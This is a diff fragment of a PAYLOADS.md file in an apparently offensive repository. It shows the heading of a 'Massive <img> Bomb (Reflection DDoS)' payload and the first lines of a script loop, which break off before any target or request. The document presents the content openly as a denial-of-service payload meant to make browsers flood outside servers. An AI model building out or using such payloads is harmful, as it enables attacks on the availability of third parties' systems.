ill-deed/ill-proxy/PAYLOADS.md

 ## 🔁 1.
 Massive <img> Bomb (Reflection DDoS)

-Same as your original concept, scaled up or randomized.
+Same as the original concept, scaled up or randomized.
 ```
 <script>
   for (let i = 0; i < 300; i++) {